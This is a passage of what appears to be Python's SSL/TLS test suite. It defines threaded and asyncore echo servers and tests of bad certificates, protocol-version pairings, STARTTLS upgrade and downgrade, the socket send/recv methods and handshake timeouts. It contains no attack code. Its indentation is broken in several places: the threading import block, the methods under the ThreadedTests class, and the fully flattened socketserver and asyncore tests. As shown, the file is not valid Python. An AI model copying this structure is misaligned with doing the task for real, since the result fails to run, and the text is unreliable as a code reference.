            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname="sha256.tbs-internet.com")
            try:
                s.connect(remote)
                if support.verbose:
                    sys.stdout.write("\nCipher with %r is %r\n" %
                                     (remote, s.cipher()))
                    sys.stdout.write("Certificate is:\n%s\n" %
                                     pprint.pformat(s.getpeercert()))
            finally:
                s.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
    # Echo server running in its own thread.  Each accepted connection is
    # serviced by a dedicated ConnectionHandler thread.  Supports plain,
    # SSL-from-the-start, and STARTTLS-upgraded conversations.

    class ConnectionHandler(threading.Thread):

        """A mildly complicated class, because we want it to work both
        with and without the SSL wrapper around the socket connection, so
        that we can test the STARTTLS functionality."""

        def __init__(self, server, connsock, addr):
            self.server = server        # owning ThreadedEchoServer
            self.running = False
            self.sock = connsock        # plain (unwrapped) socket
            self.addr = addr
            self.sock.setblocking(1)
            self.sslconn = None         # SSL-wrapped socket once wrapped
            threading.Thread.__init__(self)
            self.daemon = True

        def wrap_conn(self):
            # Upgrade self.sock to SSL.  On a failed handshake: record the
            # error, stop the whole server, and return False.
            try:
                self.sslconn = self.server.context.wrap_socket(
                    self.sock, server_side=True)
            except (ssl.SSLError, socket.error) as e:
                # Treat ECONNRESET as though it were an SSLError - OpenSSL
                # on Ubuntu abruptly closes the connection when asked to use
                # an unsupported protocol.
                if (not isinstance(e, ssl.SSLError) and
                    e.errno != errno.ECONNRESET):
                    raise
                # XXX Various errors can have happened here, for example
                # a mismatching protocol version, an invalid certificate,
                # or a low-level bug. This should be made more discriminating.
                self.server.conn_errors.append(e)
                if self.server.chatty:
                    handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
                self.running = False
                self.server.stop()
                self.close()
                return False
            else:
                # Handshake succeeded; optionally dump peer cert/cipher info.
                if self.server.context.verify_mode == ssl.CERT_REQUIRED:
                    cert = self.sslconn.getpeercert()
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
                    cert_binary = self.sslconn.getpeercert(True)
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
                cipher = self.sslconn.cipher()
                if support.verbose and self.server.chatty:
                    sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
                return True

        def read(self):
            # Read from whichever socket is currently active (TLS or plain).
            if self.sslconn:
                return self.sslconn.read()
            else:
                return self.sock.recv(1024)

        def write(self, bytes):
            # Write to whichever socket is currently active (TLS or plain).
            if self.sslconn:
                return self.sslconn.write(bytes)
            else:
                return self.sock.send(bytes)

        def close(self):
            if self.sslconn:
                self.sslconn.close()
            else:
                self.sock.close()

        def run(self):
            # Echo loop: lower-cases incoming data and honours the
            # b'over', b'STARTTLS' and b'ENDTLS' control messages.
            self.running = True
            if not self.server.starttls_server:
                # Non-STARTTLS servers wrap immediately on accept.
                if not self.wrap_conn():
                    return
            while self.running:
                try:
                    msg = self.read()
                    stripped = msg.strip()
                    if not stripped:
                        # eof, so quit this handler
                        self.running = False
                        self.close()
                    elif stripped == b'over':
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: client closed connection\n")
                        self.close()
                        return
                    elif (self.server.starttls_server and
                          stripped == b'STARTTLS'):
                        # Acknowledge, then switch this connection to TLS.
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        if not self.wrap_conn():
                            return
                    elif (self.server.starttls_server and self.sslconn
                          and stripped == b'ENDTLS'):
                        # Acknowledge, then drop back to clear text.
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
                        self.write(b"OK\n")
                        self.sock = self.sslconn.unwrap()
                        self.sslconn = None
                        if support.verbose and self.server.connectionchatty:
                            sys.stdout.write(" server: connection is now unencrypted...\n")
                    else:
                        # Ordinary payload: echo it back lower-cased.
                        if (support.verbose and
                            self.server.connectionchatty):
                            ctype = (self.sslconn and "encrypted") or "unencrypted"
                            sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
                                             % (msg, ctype, msg.lower(), ctype))
                        self.write(msg.lower())
                except socket.error:
                    if self.server.chatty:
                        handle_error("Test server failure:\n")
                    self.close()
                    self.running = False
                    # normally, we'd just stop here, but for the test
                    # harness, we want to stop the server
                    self.server.stop()

    def __init__(self, certificate=None, ssl_version=None,
                 certreqs=None, cacerts=None,
                 chatty=True, connectionchatty=False, starttls_server=False,
                 ciphers=None, context=None):
        # Either use a ready-made SSLContext, or build one from the
        # legacy keyword arguments.
        if context:
            self.context = context
        else:
            self.context = ssl.SSLContext(ssl_version
                                          if ssl_version is not None
                                          else ssl.PROTOCOL_TLSv1)
            self.context.verify_mode = (certreqs if certreqs is not None
                                        else ssl.CERT_NONE)
            if cacerts:
                self.context.load_verify_locations(cacerts)
            if certificate:
                self.context.load_cert_chain(certificate)
            if ciphers:
                self.context.set_ciphers(ciphers)
        self.chatty = chatty
        self.connectionchatty = connectionchatty
        self.starttls_server = starttls_server
        self.sock = socket.socket()
        self.port = support.bind_port(self.sock)
        self.flag = None                # Event signalled once accepting
        self.active = False
        self.conn_errors = []           # errors from failed wrap attempts
        threading.Thread.__init__(self)
        self.daemon = True

    def __enter__(self):
        # Start the server thread and wait until its accept loop runs.
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        self.stop()
        self.join()

    def start(self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        # Accept loop; the short timeout lets the loop observe
        # self.active going False so the thread exits promptly.
        self.sock.settimeout(0.05)
        self.sock.listen(5)
        self.active = True
        if self.flag:
            # signal an event
            self.flag.set()
        while self.active:
            try:
                newconn, connaddr = self.sock.accept()
                if support.verbose and self.chatty:
                    sys.stdout.write(' server: new connection from '
                                     + repr(connaddr) + '\n')
                handler = self.ConnectionHandler(self, newconn, connaddr)
                handler.start()
                handler.join()
            except socket.timeout:
                pass
            except KeyboardInterrupt:
                self.stop()
        self.sock.close()

    def stop(self):
        self.active = False
class AsyncoreEchoServer(threading.Thread):

    # this one's based on asyncore.dispatcher

    class EchoServer (asyncore.dispatcher):

        class ConnectionHandler (asyncore.dispatcher_with_send):

            def __init__(self, conn, certfile):
                # Wrap the accepted socket immediately; the handshake is
                # driven incrementally from the asyncore event loop.
                self.socket = ssl.wrap_socket(conn, server_side=True,
                                              certfile=certfile,
                                              do_handshake_on_connect=False)
                asyncore.dispatcher_with_send.__init__(self, self.socket)
                self._ssl_accepting = True
                self._do_ssl_handshake()

            def readable(self):
                if isinstance(self.socket, ssl.SSLSocket):
                    # Drain data already buffered inside OpenSSL,
                    # since select() cannot see it.
                    while self.socket.pending() > 0:
                        self.handle_read_event()
                return True

            def _do_ssl_handshake(self):
                # Advance the handshake one step; swallow WANT_READ/WRITE
                # so the event loop retries later.
                try:
                    self.socket.do_handshake()
                except ssl.SSLError as err:
                    if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                       ssl.SSL_ERROR_WANT_WRITE):
                        return
                    elif err.args[0] == ssl.SSL_ERROR_EOF:
                        return self.handle_close()
                    raise
                except socket.error as err:
                    # NOTE(review): a socket.error other than ECONNABORTED
                    # is silently swallowed here (no re-raise in the
                    # fall-through) — looks unintentional; confirm.
                    if err.args[0] == errno.ECONNABORTED:
                        return self.handle_close()
                else:
                    # Handshake complete; subsequent reads are payload.
                    self._ssl_accepting = False

            def handle_read(self):
                if self._ssl_accepting:
                    self._do_ssl_handshake()
                else:
                    # Echo payload back lower-cased; empty read means EOF.
                    data = self.recv(1024)
                    if support.verbose:
                        sys.stdout.write(" server: read %s from client\n" % repr(data))
                    if not data:
                        self.close()
                    else:
                        self.send(data.lower())

            def handle_close(self):
                self.close()
                if support.verbose:
                    sys.stdout.write(" server: closed connection %s\n" % self.socket)

            def handle_error(self):
                raise

        def __init__(self, certfile):
            self.certfile = certfile
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.port = support.bind_port(sock, '')
            asyncore.dispatcher.__init__(self, sock)
            self.listen(5)

        def handle_accepted(self, sock_obj, addr):
            if support.verbose:
                sys.stdout.write(" server: new connection from %s:%s\n" %addr)
            self.ConnectionHandler(sock_obj, self.certfile)

        def handle_error(self):
            raise

    def __init__(self, certfile):
        self.flag = None                # Event signalled once running
        self.active = False
        self.server = self.EchoServer(certfile)
        self.port = self.server.port
        threading.Thread.__init__(self)
        self.daemon = True

    def __str__(self):
        return "<%s %s>" % (self.__class__.__name__, self.server)

    def __enter__(self):
        # Start the server thread and wait until it is active.
        self.start(threading.Event())
        self.flag.wait()
        return self

    def __exit__(self, *args):
        if support.verbose:
            sys.stdout.write(" cleanup: stopping server.\n")
        self.stop()
        if support.verbose:
            sys.stdout.write(" cleanup: joining server thread.\n")
        self.join()
        if support.verbose:
            sys.stdout.write(" cleanup: successfully joined.\n")

    def start (self, flag=None):
        self.flag = flag
        threading.Thread.start(self)

    def run(self):
        # Drive the asyncore loop in short slices until stop() is called.
        self.active = True
        if self.flag:
            self.flag.set()
        while self.active:
            try:
                asyncore.loop(1)
            except:
                pass

    def stop(self):
        self.active = False
        self.server.close()
def bad_cert_test(certfile):
    """
    Launch a server with CERT_REQUIRED, and check that trying to
    connect to it with the given client certificate fails.

    Any of SSLError, socket.error or ENOENT-IOError counts as the
    expected failure; reaching the server successfully is a test error.
    """
    server = ThreadedEchoServer(CERTFILE,
                                certreqs=ssl.CERT_REQUIRED,
                                cacerts=CERTFILE, chatty=False,
                                connectionchatty=False)
    with server:
        try:
            with socket.socket() as sock:
                s = ssl.wrap_socket(sock,
                                    certfile=certfile,
                                    ssl_version=ssl.PROTOCOL_TLSv1)
                s.connect((HOST, server.port))
        except ssl.SSLError as x:
            if support.verbose:
                sys.stdout.write("\nSSLError is %s\n" % x.args[1])
        except socket.error as x:
            if support.verbose:
                sys.stdout.write("\nsocket.error is %s\n" % x.args[1])
        except IOError as x:
            # A non-existing certfile surfaces as ENOENT, which is also
            # an acceptable failure mode; anything else is unexpected.
            if x.errno != errno.ENOENT:
                raise
            if support.verbose:
                # Fixed: message previously began with "\I" (a literal
                # backslash-I typo for the intended leading newline).
                sys.stdout.write("\nIOError is %s\n" % str(x))
        else:
            raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
                       chatty=True, connectionchatty=False):
    """
    Launch a server, connect a client to it and try various reads
    and writes.
    """
    echo_server = ThreadedEchoServer(context=server_context,
                                     chatty=chatty,
                                     connectionchatty=False)
    # Client-side chatter is only emitted when both flags are on.
    talk = connectionchatty and support.verbose
    with echo_server:
        with client_context.wrap_socket(socket.socket()) as conn:
            conn.connect((HOST, echo_server.port))
            # Exercise write() with every bytes-like flavour of the payload.
            for payload in (indata, bytearray(indata), memoryview(indata)):
                if talk:
                    sys.stdout.write(
                        " client: sending %r...\n" % indata)
                conn.write(payload)
                echoed = conn.read()
                if talk:
                    sys.stdout.write(" client: read %r\n" % echoed)
                if echoed != indata.lower():
                    raise AssertionError(
                        "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
                        % (echoed[:20], len(echoed),
                           indata[:20].lower(), len(indata)))
            conn.write(b"over\n")
            if talk:
                sys.stdout.write(" client: closing connection.\n")
            conn.close()
def try_protocol_combo(server_protocol, client_protocol, expect_success,
                       certsreqs=None, server_options=0, client_options=0):
    """Run server_params_test() for one protocol pairing and assert that
    the handshake succeeds or fails as *expect_success* predicts."""
    if certsreqs is None:
        certsreqs = ssl.CERT_NONE
    certtype = {
        ssl.CERT_NONE: "CERT_NONE",
        ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
        ssl.CERT_REQUIRED: "CERT_REQUIRED",
    }[certsreqs]
    if support.verbose:
        # Braces in the trace mark combinations expected to fail.
        formatstr = " %s->%s %s\n" if expect_success else " {%s->%s} %s\n"
        sys.stdout.write(formatstr %
                         (ssl.get_protocol_name(client_protocol),
                          ssl.get_protocol_name(server_protocol),
                          certtype))
    client_context = ssl.SSLContext(client_protocol)
    client_context.options = ssl.OP_ALL | client_options
    server_context = ssl.SSLContext(server_protocol)
    server_context.options = ssl.OP_ALL | server_options
    for ctx in (client_context, server_context):
        ctx.verify_mode = certsreqs
        # NOTE: we must enable "ALL" ciphers, otherwise an SSLv23 client
        # will send an SSLv3 hello (rather than SSLv2) starting from
        # OpenSSL 1.0.0 (see issue #8322).
        ctx.set_ciphers("ALL")
        ctx.load_cert_chain(CERTFILE)
        ctx.load_verify_locations(CERTFILE)
    try:
        server_params_test(client_context, server_context,
                           chatty=False, connectionchatty=False)
    # Protocol mismatch can result in either an SSLError, or a
    # "Connection reset by peer" error.
    except ssl.SSLError:
        if expect_success:
            raise
    except socket.error as err:
        if expect_success or err.errno != errno.ECONNRESET:
            raise
    else:
        if not expect_success:
            raise AssertionError(
                "Client protocol %s succeeded with server protocol %s!"
                % (ssl.get_protocol_name(client_protocol),
                   ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
    """Basic test of an SSL client connecting to a server"""
    if support.verbose:
        sys.stdout.write("\n")
    for proto in PROTOCOLS:
        ctx = ssl.SSLContext(proto)
        ctx.load_cert_chain(CERTFILE)
        # The same context serves both the client and the server side.
        server_params_test(ctx, ctx, chatty=True, connectionchatty=True)
def test_getpeercert(self):
    """A verified connection must expose a decoded peer certificate."""
    if support.verbose:
        sys.stdout.write("\n")
    # Server and client share the same self-signed cert, so verification
    # succeeds and getpeercert() returns the decoded certificate.
    context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(CERTFILE)
    context.load_cert_chain(CERTFILE)
    server = ThreadedEchoServer(context=context, chatty=False)
    with server:
        s = context.wrap_socket(socket.socket())
        s.connect((HOST, server.port))
        cert = s.getpeercert()
        self.assertTrue(cert, "Can't get peer certificate.")
        cipher = s.cipher()
        if support.verbose:
            sys.stdout.write(pprint.pformat(cert) + '\n')
            sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
        if 'subject' not in cert:
            self.fail("No subject field in certificate: %s." %
                      pprint.pformat(cert))
        if ((('organizationName', 'Python Software Foundation'),)
            not in cert['subject']):
            self.fail(
                "Missing or invalid 'organizationName' field in certificate subject; "
                "should be 'Python Software Foundation'.")
        self.assertIn('notBefore', cert)
        self.assertIn('notAfter', cert)
        # Validity interval must be well-ordered.
        before = ssl.cert_time_to_seconds(cert['notBefore'])
        after = ssl.cert_time_to_seconds(cert['notAfter'])
        self.assertLess(before, after)
        s.close()
def test_empty_cert(self):
    """Connecting with an empty cert file"""
    here = os.path.dirname(__file__) or os.curdir
    bad_cert_test(os.path.join(here, "nullcert.pem"))
def test_malformed_cert(self):
    """Connecting with a badly formatted certificate (syntax error)"""
    here = os.path.dirname(__file__) or os.curdir
    bad_cert_test(os.path.join(here, "badcert.pem"))
def test_nonexisting_cert(self):
    """Connecting with a non-existing cert file"""
    here = os.path.dirname(__file__) or os.curdir
    bad_cert_test(os.path.join(here, "wrongcert.pem"))
def test_malformed_key(self):
    """Connecting with a badly formatted key (syntax error)"""
    here = os.path.dirname(__file__) or os.curdir
    bad_cert_test(os.path.join(here, "badkey.pem"))
def test_rude_shutdown(self):
    """A brutal shutdown of an SSL server should raise an IOError
    in the client when attempting handshake.
    """
    listener_ready = threading.Event()
    listener_gone = threading.Event()

    s = socket.socket()
    port = support.bind_port(s, HOST)

    # `listener` runs in a thread.  It sits in an accept() until
    # the main thread connects.  Then it rudely closes the socket,
    # and sets Event `listener_gone` to let the main thread know
    # the socket is gone.
    def listener():
        s.listen(5)
        listener_ready.set()
        newsock, addr = s.accept()
        newsock.close()
        s.close()
        listener_gone.set()

    def connector():
        listener_ready.wait()
        with socket.socket() as c:
            c.connect((HOST, port))
            # Only attempt the handshake once the peer is known dead.
            listener_gone.wait()
            try:
                ssl_sock = ssl.wrap_socket(c)
            except IOError:
                pass
            else:
                self.fail('connecting to closed SSL socket should have failed')

    t = threading.Thread(target=listener)
    t.start()
    try:
        connector()
    finally:
        t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'), "need SSLv2")
def test_protocol_sslv2(self):
    """Connecting to an SSLv2 server with various client options"""
    if support.verbose:
        sys.stdout.write("\n")
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True)
    # SSLv3-only and TLSv1-only clients cannot talk to an SSLv2 server.
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
    # SSLv23 client with specific SSL options
    if no_sslv2_implies_sslv3_hello():
        # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
        try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
                           client_options=ssl.OP_NO_SSLv2)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
                       client_options=ssl.OP_NO_SSLv3)
    try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, True,
                       client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
    """Connecting to an SSLv23 server with various client options"""
    if support.verbose:
        sys.stdout.write("\n")
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        try:
            try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
        except (ssl.SSLError, socket.error) as x:
            # this fails on some older versions of OpenSSL (0.9.7l, for instance)
            if support.verbose:
                sys.stdout.write(
                    " SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
                    % str(x))
    # An SSLv23 server must accept every protocol and certificate mode.
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)

    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)

    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)

    # Server with specific SSL options
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
                       server_options=ssl.OP_NO_SSLv3)
    # Will choose TLSv1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
                       server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
                       server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv3(self):
    """Connecting to an SSLv3 server with various client options"""
    if support.verbose:
        sys.stdout.write("\n")
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
    # Mismatched protocol versions must not connect.
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
                       client_options=ssl.OP_NO_SSLv3)
    try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
    if no_sslv2_implies_sslv3_hello():
        # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
        try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, True,
                           client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
    """Connecting to a TLSv1 server with various client options"""
    if support.verbose:
        sys.stdout.write("\n")
    try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
    try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
    try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
    # Mismatched protocol versions must not connect.
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
    try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
    try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
                       client_options=ssl.OP_NO_TLSv1)
    def test_starttls(self):
        """Switching from clear text to encrypted and back again."""
        # The scripted conversation: plain text until STARTTLS, encrypted
        # until ENDTLS, then plain text again.
        msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
        server = ThreadedEchoServer(CERTFILE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    starttls_server=True,
                                    chatty=True,
                                    connectionchatty=True)
        # Tracks whether the connection is currently wrapped in TLS; decides
        # whether to use the raw socket `s` or the SSL object `conn`.
        wrapped = False
        with server:
            s = socket.socket()
            s.setblocking(1)
            s.connect((HOST, server.port))
            if support.verbose:
                sys.stdout.write("\n")
            for indata in msgs:
                if support.verbose:
                    sys.stdout.write(
                        " client: sending %r...\n" % indata)
                if wrapped:
                    conn.write(indata)
                    outdata = conn.read()
                else:
                    s.send(indata)
                    outdata = s.recv(1024)
                msg = outdata.strip().lower()
                if indata == b"STARTTLS" and msg.startswith(b"ok"):
                    # STARTTLS ok, switch to secure mode
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, starting TLS...\n"
                            % msg)
                    conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    wrapped = True
                elif indata == b"ENDTLS" and msg.startswith(b"ok"):
                    # ENDTLS ok, switch back to clear text
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server, ending TLS...\n"
                            % msg)
                    # unwrap() returns the underlying plain socket.
                    s = conn.unwrap()
                    wrapped = False
                else:
                    if support.verbose:
                        sys.stdout.write(
                            " client: read %r from server\n" % msg)
            if support.verbose:
                sys.stdout.write(" client: closing connection.\n")
            # Say goodbye over whichever channel is currently active.
            if wrapped:
                conn.write(b"over\n")
            else:
                s.send(b"over\n")
            if wrapped:
                conn.close()
            else:
                s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://%s:%d/%s' % (
HOST, server.port, os.path.split(CERTFILE)[1])
f = urllib.request.urlopen(url)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
    def test_recv_send(self):
        """Test recv(), send() and friends."""
        if support.verbose:
            sys.stdout.write("\n")
        server = ThreadedEchoServer(CERTFILE,
                                    certreqs=ssl.CERT_NONE,
                                    ssl_version=ssl.PROTOCOL_TLSv1,
                                    cacerts=CERTFILE,
                                    chatty=True,
                                    connectionchatty=False)
        with server:
            s = ssl.wrap_socket(socket.socket(),
                                server_side=False,
                                certfile=CERTFILE,
                                ca_certs=CERTFILE,
                                cert_reqs=ssl.CERT_NONE,
                                ssl_version=ssl.PROTOCOL_TLSv1)
            s.connect((HOST, server.port))
            # helper methods for standardising recv* method signatures
            def _recv_into():
                b = bytearray(b"\0"*100)
                count = s.recv_into(b)
                return b[:count]
            def _recvfrom_into():
                b = bytearray(b"\0"*100)
                count, addr = s.recvfrom_into(b)
                return b[:count]
            # (name, method, whether to expect success, *args)
            # The *to/*from variants are expected to fail on an SSL socket
            # (they make no sense without plain datagram addressing).
            send_methods = [
                ('send', s.send, True, []),
                ('sendto', s.sendto, False, ["some.address"]),
                ('sendall', s.sendall, True, []),
            ]
            recv_methods = [
                ('recv', s.recv, True, []),
                ('recvfrom', s.recvfrom, False, ["some.address"]),
                ('recv_into', _recv_into, True, []),
                ('recvfrom_into', _recvfrom_into, False, []),
            ]
            # Each payload embeds the method name so echoes can't be confused.
            data_prefix = "PREFIX_"
            for meth_name, send_meth, expect_success, args in send_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    send_meth(indata, *args)
                    # The echo server replies with the lower-cased payload.
                    outdata = s.read()
                    if outdata != indata.lower():
                        self.fail(
                            "While sending with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    # Unsupported methods raise ValueError naming themselves.
                    if expect_success:
                        self.fail(
                            "Failed to send with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
            for meth_name, recv_meth, expect_success, args in recv_methods:
                indata = (data_prefix + meth_name).encode('ascii')
                try:
                    s.send(indata)
                    outdata = recv_meth(*args)
                    if outdata != indata.lower():
                        self.fail(
                            "While receiving with <<{name:s}>> bad data "
                            "<<{outdata:r}>> ({nout:d}) received; "
                            "expected <<{indata:r}>> ({nin:d})\n".format(
                                name=meth_name, outdata=outdata[:20],
                                nout=len(outdata),
                                indata=indata[:20], nin=len(indata)
                            )
                        )
                except ValueError as e:
                    if expect_success:
                        self.fail(
                            "Failed to receive with method <<{name:s}>>; "
                            "expected to succeed.\n".format(name=meth_name)
                        )
                    if not str(e).startswith(meth_name):
                        self.fail(
                            "Method <<{name:s}>> failed with unexpected "
                            "exception message: {exp:s}\n".format(
                                name=meth_name, exp=e
                            )
                        )
                    # consume data
                    s.read()
            s.write(b"over\n")
            s.close()
    def test_handshake_timeout(self):
        # Issue #5103: SSL handshake must respect the socket timeout
        server = socket.socket(socket.AF_INET)
        host = "127.0.0.1"
        port = support.bind_port(server)
        started = threading.Event()
        # Flag read by the server thread; flipped to True in the finally
        # block below to make the thread exit its accept loop.
        finish = False
        def serve():
            server.listen(5)
            started.set()
            conns = []
            while not finish:
                r, w, e = select.select([server], [], [], 0.1)
                if server in r:
                    # Let the socket hang around rather than having
                    # it closed by garbage collection.
                    conns.append(server.accept()[0])
            for sock in conns:
                sock.close()
        t = threading.Thread(target=serve)
        t.start()
        started.wait()
        try:
            try:
                # Case 1: wrap an already-connected socket; the handshake
                # must time out because the server never speaks TLS.
                c = socket.socket(socket.AF_INET)
                c.settimeout(0.2)
                c.connect((host, port))
                # Will attempt handshake and time out
                self.assertRaisesRegex(socket.timeout, "timed out",
                                       ssl.wrap_socket, c)
            finally:
                c.close()
            try:
                # Case 2: wrap first, then connect; connect() performs the
                # handshake implicitly and must also time out.
                c = socket.socket(socket.AF_INET)
                c = ssl.wrap_socket(c)
                c.settimeout(0.2)
                # Will attempt handshake and time out
                self.assertRaisesRegex(socket.timeout, "timed out",
                                       c.connect, (host, port))
            finally:
                c.close()
        finally:
            finish = True
            t.join()
            server.close()
    def test_server_accept(self):
        # Issue #16357: accept() on a SSLSocket created through
